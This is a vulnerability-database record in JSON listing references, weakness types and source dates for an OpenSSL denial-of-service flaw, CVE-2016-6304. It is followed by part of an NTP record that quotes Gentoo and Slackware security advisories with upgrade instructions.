"https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "openssl-x509-vulnerabilities", "trust": 0.1, "url": "https://github.com/guidovranken/openssl-x509-vulnerabilities " }, { "title": "CheckCVE for Probe Manager", "trust": 0.1, "url": "https://github.com/treussart/probemanager_checkcve " }, { "title": "hackerone-publicy-disclosed", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "OpenSSL-CVE-lib", "trust": 0.1, "url": "https://github.com/chnzzh/openssl-cve-lib " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/oracle-fixes-253-vulnerabilities-in-last-cpu-of-2016/121375/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/openssl-patches-high-severity-ocsp-bug-mitigates-sweet32-attack/120845/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "CNNVD", "id": "CNNVD-201609-579" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-401", "trust": 1.0 }, { "problemtype": "CWE-399", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2802.html" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:2493" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1658" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1414" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2017:1413" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2017-1659.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "trust": 1.7, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/93150" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.7, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10171" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1037640" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036878" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2017:2494" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2017:1802" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2017:1801" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2017-1415.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00027.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00021.html" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.7, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2016/oct/62" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2016/dec/47" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.7, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00021.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/139091/openssl-x509-parsing-double-free-invalid-free.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=2c0d295e26306e15a92eb23a84a1802005c1c137" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6304" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6304" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.7, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.7, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.7, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.7, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.7, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.6, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.6, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=2c0d295e26306e15a92eb23a84a1802005c1c137" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914246-1.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0680" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4645/" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-054-03" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2016-8610" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8610" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "https://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2016-10-07.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991896" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009586" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1009648" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21985392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992427" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992681" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21994534" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994861" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995038" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995886" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996181" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-009-cve-2016-6304" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.2, "url": "https://issues.jboss.org/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8740" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-0736" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8743" }, { "trust": 0.2, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7056" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8743" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2161" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8740" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-7056" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0736" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2161" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/401.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:2802" }, { "trust": 0.1, "url": "https://github.com/guidovranken/openssl-x509-vulnerabilities" }, { "trust": 0.1, "url": "https://github.com/treussart/probemanager_checkcve" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5664" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-5647" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5647" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/3155411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5664" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "BID", "id": "93150" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "142849" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "CNNVD", "id": "CNNVD-201609-579" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "BID", "id": "93150" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "142849" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "CNNVD", "id": "CNNVD-201609-579" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-26T00:00:00", "db": "VULMON", "id": "CVE-2016-6304" }, { "date": "2016-09-23T00:00:00", "db": "BID", "id": "93150" }, { "date": "2016-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "date": "2017-06-07T22:47:57", "db": "PACKETSTORM", "id": "142848" }, { "date": "2017-08-22T05:29:02", "db": "PACKETSTORM", "id": "143874" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2017-06-07T22:48:07", "db": "PACKETSTORM", "id": "142849" }, { "date": "2017-06-28T22:12:00", "db": "PACKETSTORM", "id": "143176" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-11-17T23:52:44", "db": "PACKETSTORM", "id": "139769" }, { "date": "2017-06-28T22:37:00", "db": "PACKETSTORM", "id": "143181" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-579" }, { "date": "2016-09-26T19:59:00.157000", "db": "NVD", "id": "CVE-2016-6304" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-6304" }, { "date": "2018-04-18T09:00:00", "db": "BID", "id": "93150" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-579" }, { "date": "2023-11-07T02:33:57.020000", "db": "NVD", "id": "CVE-2016-6304" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "CNNVD", "id": "CNNVD-201609-579" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of t1_lib.c Denial of service in Japan (DoS) Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004990" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-579" } ], "trust": 0.6 } }
var-201701-0422
Vulnerability from variot
ntpd in NTP 4.2.8p3 and NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92 relies on the underlying operating system to protect it from requests that impersonate reference clocks. Because reference clocks are treated like other peers and stored in the same structure, any packet with a source ip address of a reference clock (127.127.1.1 for example) that reaches the receive() function will match that reference clock's peer record and will be treated as a trusted peer. Any system that lacks the typical martian packet filtering which would block these packets is in danger of having its time controlled by an attacker. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a remote security vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and perform some unauthorized actions to the application. This may aid in further attacks. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Background
NTP contains software for the Network Time Protocol.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could possibly cause a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2016-120-01)
New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 